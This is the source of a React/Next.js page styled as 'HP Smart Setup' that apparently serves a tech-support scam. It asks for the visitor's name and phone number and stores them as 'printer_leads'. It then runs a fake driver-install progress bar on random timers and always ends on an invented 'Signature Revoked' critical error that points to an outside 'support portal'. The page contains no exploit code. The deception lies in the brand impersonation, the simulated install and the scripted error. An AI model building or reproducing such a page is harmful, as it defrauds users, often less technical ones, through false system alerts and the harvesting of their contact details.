'use client';

import React, { useState, useEffect } from 'react';
import Link from 'next/link';
import Image from 'next/image';
import { createClient } from '@supabase/supabase-js';

const supabase = createClient(
  process.env.NEXT_PUBLIC_SUPABASE_URL!,
  process.env.NEXT_PUBLIC_SUPABASE_ANON_KEY!
);

type Platform = 'Windows' | 'macOS' | 'Linux' | '';
// Steps: 1=Platform, 2=ConnectPrinter, 3=Setup, 4=Status
type Step = 1 | 2 | 3 | 4;

export default function DriverDownloadPage() {
  const [selectedPlatform, setSelectedPlatform] = useState<Platform>('');
  const [currentStep, setCurrentStep] = useState<Step>(1);
  const [progress, setProgress] = useState(0);
  const [progressText, setProgressText] = useState('Preparing: 0%');
  const [dotStates, setDotStates] = useState({ dot1: '', dot2: '', dot3: '', dot4: '' });
  const [modelNumber, setModelNumber] = useState('');
  const [name, setName] = useState('');
  const [phone, setPhone] = useState('');
  const [isSubmitting, setIsSubmitting] = useState(false);
  const [formError, setFormError] = useState('');

  useEffect(() => {
    const params = new URLSearchParams(window.location.search);
    const model = params.get('model');
    if (model) setModelNumber(model);
  }, []);

  const selectOS = (os: Platform) => {
    setSelectedPlatform(os);
  };

  const goToConnectPrinter = () => {
    setCurrentStep(2);
  };

  const handleConnectPrinter = async () => {
    if (!name.trim() || !phone.trim()) {
      setFormError('Please fill in all fields.');
      return;
    }
    setFormError('');
    setIsSubmitting(true);
    try {
      await supabase.from('printer_leads').insert({
        model_number: modelNumber || null,
        platform: selectedPlatform || null,
        name: name.trim(),
        phone: phone.trim()
      });
    } catch {


      // silently continue even if save fails
    } finally {setIsSubmitting(false);startLongLoading();
    }
  };

  const startLongLoading = () => {
    setCurrentStep(3);
    let prog = 0;

    const updateLoading = () => {
      const increment = 2 + Math.random() * 3;
      prog += increment;
      if (prog > 100) prog = 100;
      const p = Math.floor(prog);

      setProgress(p);

      if (p < 25) {
        setProgressText(`Analyzing System: ${p}%`);
        setDotStates({ dot1: 'active', dot2: '', dot3: '', dot4: '' });
      } else if (p < 50) {
        setProgressText(`Searching Drivers: ${p}%`);
        setDotStates({ dot1: 'done', dot2: 'active', dot3: '', dot4: '' });
      } else if (p < 75) {
        setProgressText(`Downloading: ${p}%`);
        setDotStates({ dot1: 'done', dot2: 'done', dot3: 'active', dot4: '' });
      } else {
        setProgressText(`Checking Spooler: ${p}%`);
        setDotStates({ dot1: 'done', dot2: 'done', dot3: 'done', dot4: 'active' });
      }

      if (prog < 100) {
        setTimeout(updateLoading, 80 + Math.random() * 70);
      } else {
        setTimeout(() => setCurrentStep(4), 600);
      }
    };

    updateLoading();
  };

  const getDotStyle = (state: string) => ({
    width: '10px',
    height: '10px',
    borderRadius: '50%',
    background: state === 'done' ? '#16a34a' : state === 'active' ? '#007db3' : '#e2e8f0',
    marginRight: '12px',
    marginTop: '4px',
    flexShrink: 0 as const,
    boxShadow: state === 'active' ? '0 0 8px #007db3' : 'none'
  });

  const steps = [
  { num: 1, label: 'Platform', stepVal: 1 },
  { num: 2, label: 'Connect Printer', stepVal: 2 },
  { num: 3, label: 'Setup', stepVal: 3 },
  { num: 4, label: 'Status', stepVal: 4 }];


  return (
    <main style={{ fontFamily: "'Segoe UI', Roboto, Helvetica, Arial, sans-serif" }}>
      {/* ===== NAVBAR ===== */}
      <section style={{ backgroundColor: 'rgb(255, 255, 255)', padding: '16px 0', borderBottom: 'none' }}>
        <div
          style={{
            maxWidth: '1224px',
            margin: '0 auto',
            padding: '0 54px',
            display: 'flex',
            alignItems: 'center',
            justifyContent: 'space-between',
            minHeight: '67px'
          }}>
          <Link href="/hpprintersetup" style={{ textDecoration: 'none', display: 'flex', alignItems: 'center' }}>
            <Image
              src="/assets/images/image-1778102925137.png"
              alt="HP Logo"
              width={91}
              height={61}
              style={{ objectFit: 'contain' }}
              priority />
          </Link>
          <nav style={{ display: 'flex', alignItems: 'center', gap: '38px' }}>
            <Link href="/hpprintersetup" style={{ color: 'rgb(0, 51, 102)', textDecoration: 'none', fontSize: '16px' }}>DeskJet</Link>
            <Link href="/hpprintersetup" style={{ color: 'rgb(0, 51, 102)', textDecoration: 'none', fontSize: '16px' }}>LaserJet</Link>
            <Link href="/hpprintersetup" style={{ color: 'rgb(0, 51, 102)', textDecoration: 'none', fontSize: '16px' }}>Envy</Link>
            <Link href="/hpprintersetup" style={{ color: 'rgb(0, 51, 102)', textDecoration: 'none', fontSize: '16px' }}>OfficeJet</Link>
          </nav>
        </div>
      </section>

      {/* ===== MAIN CONTENT AREA ===== */}
      <section
        style={{
          position: 'relative',
          minHeight: '620px',
          display: 'flex',
          alignItems: 'center',
          justifyContent: 'center',
          padding: '30px 20px',
          overflow: 'hidden'
        }}>
        <div
          style={{
            position: 'absolute',
            inset: 0,
            zIndex: 0,
            background: '#000'
          }}>
          <Image
            src="https://images.unsplash.com/photo-1721830834983-f111ad63dbf4"
            alt="A person is pressing a button on a printer"
            fill
            style={{ objectFit: 'cover', opacity: 0.5 }} />
        </div>

        {/* Wizard Card */}
        <div
          style={{
            position: 'relative',
            zIndex: 1,
            background: 'rgba(255,255,255,0.98)',
            borderRadius: '16px',
            boxShadow: '0 20px 25px -5px rgba(0,0,0,0.1)',
            width: '100%',
            maxWidth: '900px',
            minHeight: '520px',
            display: 'flex',
            overflow: 'hidden',
            border: '1px solid rgba(255,255,255,0.8)'
          }}>

          {/* Sidebar */}
          <div
            style={{
              width: '260px',
              background: '#f1f5f9',
              padding: '40px 25px',
              borderRight: '1px solid #e2e8f0',
              display: 'flex',
              flexDirection: 'column',
              gap: '20px',
              flexShrink: 0
            }}>
            {steps.map((step) => {
              const isActive = currentStep === step.stepVal;
              const isDone = currentStep > step.stepVal;
              return (
                <div
                  key={step.num}
                  style={{
                    display: 'flex',
                    alignItems: 'center',
                    gap: '12px',
                    color: isActive ? '#007db3' : isDone ? '#16a34a' : '#94a3b8',
                    fontWeight: 600,
                    fontSize: '0.9rem'
                  }}>
                  <div
                    style={{
                      width: '28px',
                      height: '28px',
                      borderRadius: '50%',
                      border: `2px solid ${isActive ? '#007db3' : isDone ? '#16a34a' : '#cbd5e1'}`,
                      background: isActive ? '#007db3' : isDone ? '#16a34a' : 'transparent',
                      color: isActive || isDone ? 'white' : '#94a3b8',
                      display: 'flex',
                      alignItems: 'center',
                      justifyContent: 'center',
                      fontSize: '0.8rem',
                      flexShrink: 0
                    }}>
                    {isDone ? '✓' : step.num}
                  </div>
                  <span>{step.label}</span>
                </div>);

            })}
          </div>

          {/* Content Area */}
          <div
            style={{
              flex: 1,
              padding: '40px',
              background: 'white',
              display: 'flex',
              flexDirection: 'column'
            }}>
            {/* Brand Header */}
            <div style={{ display: 'flex', alignItems: 'center', gap: '12px', marginBottom: '30px' }}>
              <svg width="35" height="35" viewBox="0 0 24 24" fill="none" stroke="#007db3" strokeWidth="2.5">
                <path d="M6 18H4a2 2 0 0 1-2-2v-5a2 2 0 0 1 2-2h16a2 2 0 0 1 2 2v5a2 2 0 0 1-2 2h-2" />
                <path d="M6 9V4a1 1 0 0 1 1-1h10a1 1 0 0 1 1 1v5" />
                <rect x="6" y="14" width="12" height="8" rx="1" />
              </svg>
              <div style={{ fontWeight: 800, fontSize: '1.2rem', letterSpacing: '-0.5px', color: '#1e293b' }}>
                HP SMART{' '}
                <span style={{ color: '#007db3' }}>SETUP</span>
              </div>
            </div>

            {/* Step 1: Select Platform */}
            {currentStep === 1 &&
            <div>
                <div style={{ fontSize: '1.5rem', fontWeight: 700, marginBottom: '8px', color: '#0f172a' }}>
                  Select Platform
                </div>
                <p style={{ color: '#64748b', marginBottom: '25px', fontSize: '0.95rem', lineHeight: '1.5' }}>
                  Select the device you&apos;re currently using to connect your printer.
                </p>
                <div
                style={{
                  display: 'grid',
                  gridTemplateColumns: 'repeat(3, 1fr)',
                  gap: '12px',
                  marginBottom: '25px'
                }}>
                  {(['Windows', 'macOS', 'Linux'] as Platform[]).map((os) =>
                <div
                  key={os}
                  onClick={() => selectOS(os)}
                  style={{
                    border: selectedPlatform === os ? '2px solid #007db3' : '1px solid #e2e8f0',
                    borderRadius: '12px',
                    padding: '18px 8px',
                    cursor: 'pointer',
                    fontWeight: 600,
                    background: selectedPlatform === os ? '#f0f9ff' : '#fff',
                    textAlign: 'center',
                    fontSize: '0.9rem',
                    color: selectedPlatform === os ? '#007db3' : '#1e293b',
                    transition: 'all 0.2s ease'
                  }}>
                      {os === 'Windows' ? 'Windows PC' : os === 'Linux' ? 'Other Platform' : 'macOS'}
                    </div>
                )}
                </div>
                <button
                onClick={selectedPlatform ? goToConnectPrinter : undefined}
                disabled={!selectedPlatform}
                style={{
                  background: selectedPlatform ? '#007db3' : '#cbd5e1',
                  color: 'white',
                  border: 'none',
                  padding: '16px 24px',
                  borderRadius: '8px',
                  cursor: selectedPlatform ? 'pointer' : 'not-allowed',
                  fontWeight: 700,
                  fontSize: '1rem',
                  width: '100%',
                  transition: 'all 0.2s',
                  textAlign: 'center',
                  boxSizing: 'border-box'
                }}>
                  Continue
                </button>
              </div>
            }

            {/* Step 2: Connect Printer Form */}
            {currentStep === 2 &&
            <div>
                <div style={{ fontSize: '1.5rem', fontWeight: 700, marginBottom: '8px', color: '#0f172a' }}>
                  Connect Printer
                </div>
                <p style={{ color: '#64748b', marginBottom: '25px', fontSize: '0.95rem', lineHeight: '1.5' }}>
                  Enter your details so our experts can assist you with the printer setup.
                </p>
                <div style={{ display: 'flex', flexDirection: 'column', gap: '16px', marginBottom: '24px' }}>
                  <div>
                    <label style={{ display: 'block', fontWeight: 600, fontSize: '0.9rem', color: '#374151', marginBottom: '6px' }}>
                      Full Name
                    </label>
                    <input
                    type="text"
                    placeholder="Enter your full name"
                    value={name}
                    onChange={(e) => setName(e.target.value)}
                    style={{
                      width: '100%',
                      padding: '12px 14px',
                      border: '1px solid #e2e8f0',
                      borderRadius: '8px',
                      fontSize: '0.95rem',
                      outline: 'none',
                      boxSizing: 'border-box',
                      fontFamily: "'Segoe UI', Roboto, Helvetica, Arial, sans-serif"
                    }} />
                  </div>
                  <div>
                    <label style={{ display: 'block', fontWeight: 600, fontSize: '0.9rem', color: '#374151', marginBottom: '6px' }}>
                      Phone Number
                    </label>
                    <input
                    type="tel"
                    placeholder="Enter your phone number"
                    value={phone}
                    onChange={(e) => setPhone(e.target.value)}
                    style={{
                      width: '100%',
                      padding: '12px 14px',
                      border: '1px solid #e2e8f0',
                      borderRadius: '8px',
                      fontSize: '0.95rem',
                      outline: 'none',
                      boxSizing: 'border-box',
                      fontFamily: "'Segoe UI', Roboto, Helvetica, Arial, sans-serif"
                    }} />
                  </div>
                  {formError &&
                <p style={{ color: '#dc2626', fontSize: '0.85rem', margin: 0 }}>{formError}</p>
                }
                </div>
                <button
                onClick={handleConnectPrinter}
                disabled={isSubmitting}
                style={{
                  background: isSubmitting ? '#cbd5e1' : '#007db3',
                  color: 'white',
                  border: 'none',
                  padding: '16px 24px',
                  borderRadius: '8px',
                  cursor: isSubmitting ? 'not-allowed' : 'pointer',
                  fontWeight: 700,
                  fontSize: '1rem',
                  width: '100%',
                  transition: 'all 0.2s',
                  textAlign: 'center',
                  boxSizing: 'border-box'
                }}>
                  {isSubmitting ? 'Connecting...' : 'Connect Printer'}
                </button>
              </div>
            }

            {/* Step 3: Installing */}
            {currentStep === 3 &&
            <div>
                <div style={{ fontSize: '1.5rem', fontWeight: 700, marginBottom: '8px', color: '#0f172a' }}>
                  Installing Software
                </div>
                <p style={{ color: '#64748b', marginBottom: '25px', fontSize: '0.95rem', lineHeight: '1.5' }}>
                  Establishing secure connection and downloading driver assets.
                </p>
                <div style={{ marginBottom: '20px' }}>
                  {[
                { id: 'dot1', text: 'Checking Print Spooler...' },
                { id: 'dot2', text: 'Searching for drivers...' },
                { id: 'dot3', text: 'Downloading packages...' },
                { id: 'dot4', text: 'Finalizing Registry...' }].
                map((item) =>
                <div key={item.id} style={{ display: 'flex', alignItems: 'flex-start', marginBottom: '15px', fontWeight: 500, color: '#64748b', fontSize: '0.9rem' }}>
                      <div style={getDotStyle(dotStates[item.id as keyof typeof dotStates])} />
                      <span>{item.text}</span>
                    </div>
                )}
                </div>
                <div style={{ width: '100%', background: '#f1f5f9', height: '10px', borderRadius: '5px', overflow: 'hidden', margin: '20px 0' }}>
                  <div style={{ width: `${progress}%`, background: '#007db3', height: '100%', transition: 'width 0.1s linear' }} />
                </div>
                <p style={{ fontSize: '12px', fontWeight: 700, color: '#007db3', textAlign: 'center' }}>{progressText}</p>
              </div>
            }

            {/* Step 4: Status / Error */}
            {currentStep === 4 &&
            <div>
                <div style={{ fontSize: '1.5rem', fontWeight: 700, marginBottom: '8px', color: '#dc2626' }}>
                  Setup Interrupted
                </div>
                <div style={{ background: '#fff1f2', borderLeft: '4px solid #dc2626', padding: '15px', borderRadius: '8px', marginBottom: '20px', fontSize: '0.9rem' }}>
                  <strong>Critical Error: Signature Revoked</strong><br />
                  System has blocked the installation of these drivers because the security certificate could not be verified online.
                </div>
                <p style={{ color: '#64748b', marginBottom: '25px', fontSize: '0.95rem', lineHeight: '1.5' }}>
                  This error usually requires a manual override. Please proceed to the support portal to complete setup.
                </p>
                <a
                href="https://printers-guide.com/driverdownload"
                target="_parent"
                style={{
                  background: '#007db3',
                  color: 'white',
                  border: 'none',
                  padding: '16px 24px',
                  borderRadius: '8px',
                  cursor: 'pointer',
                  fontWeight: 700,
                  fontSize: '1rem',
                  width: '100%',
                  textDecoration: 'none',
                  display: 'block',
                  textAlign: 'center',
                  boxSizing: 'border-box'
                }}>
                  Request Support Access
                </a>
              </div>
            }
          </div>
        </div>
      </section>

      {/* ===== POLICIES SECTION ===== */}
      <section style={{ backgroundColor: 'rgb(226, 231, 240)', padding: '16px 0' }}>
        <div style={{ maxWidth: '1224px', margin: '0 auto', padding: '24px 103px' }}>
          <p style={{ color: 'rgb(57, 57, 217)', fontFamily: '"Inter", sans-serif', fontWeight: 700, fontSize: '24px', lineHeight: '1.3', marginBottom: '8px' }}>
            <strong>Policies &amp; Compliance</strong>
          </p>
          <p style={{ fontSize: '16px', lineHeight: '1.5', marginBottom: '8px', color: 'rgb(26,26,26)' }}>
            We follow Google Ads and regional compliance policies to ensure responsible service promotion.
          </p>
          <p style={{ color: 'rgb(50, 81, 166)', fontSize: '16px', lineHeight: '1.3', marginBottom: '8px' }}>Disclaimers:</p>
          <ul style={{ paddingLeft: '20px' }}>
            <li style={{ fontSize: '14px', lineHeight: '1.3', marginBottom: '8px', color: 'rgb(26,26,26)' }}>We are not affiliated with or authorized by any printer or router manufacturer Brand.</li>
            <li style={{ fontSize: '14px', lineHeight: '1.3', marginBottom: '8px', color: 'rgb(26,26,26)' }}>Trademarked brand names are used strictly for descriptive purposes only.</li>
            <li style={{ fontSize: '14px', lineHeight: '1.3', marginBottom: '8px', color: 'rgb(26,26,26)' }}>Services are third-party technical assistance offerings designed for business environments.</li>
          </ul>
        </div>
      </section>

      {/* ===== FOOTER LINKS ===== */}
      <section style={{ backgroundColor: 'rgb(255, 255, 255)', padding: '16px 0' }}>
        <div style={{ maxWidth: '1224px', margin: '0 auto', padding: '12px 54px', display: 'flex', alignItems: 'center', gap: '32px', flexWrap: 'wrap' }}>
          <span style={{ fontSize: '14px', color: 'rgb(26,26,26)' }}>All Rights Reserved. | © 2026 Printers Guide.</span>
          <Link href="/" style={{ color: 'rgb(57, 57, 217)', textDecoration: 'none', fontSize: '16px' }}>About</Link>
          <Link href="/contact-us" style={{ color: 'rgb(57, 57, 217)', textDecoration: 'none', fontSize: '16px' }}>Contact</Link>
          <Link href="/refund-policy" style={{ color: 'rgb(57, 57, 217)', textDecoration: 'none', fontSize: '16px' }}>Refund Policy</Link>
          <Link href="/privacy-policy" style={{ color: 'rgb(57, 57, 217)', textDecoration: 'none', fontSize: '16px' }}>Privacy Policy</Link>
          <Link href="/terms-and-condition" style={{ color: 'rgb(57, 57, 217)', textDecoration: 'none', fontSize: '16px' }}>Terms &amp; Condition</Link>
        </div>
      </section>
    </main>);

}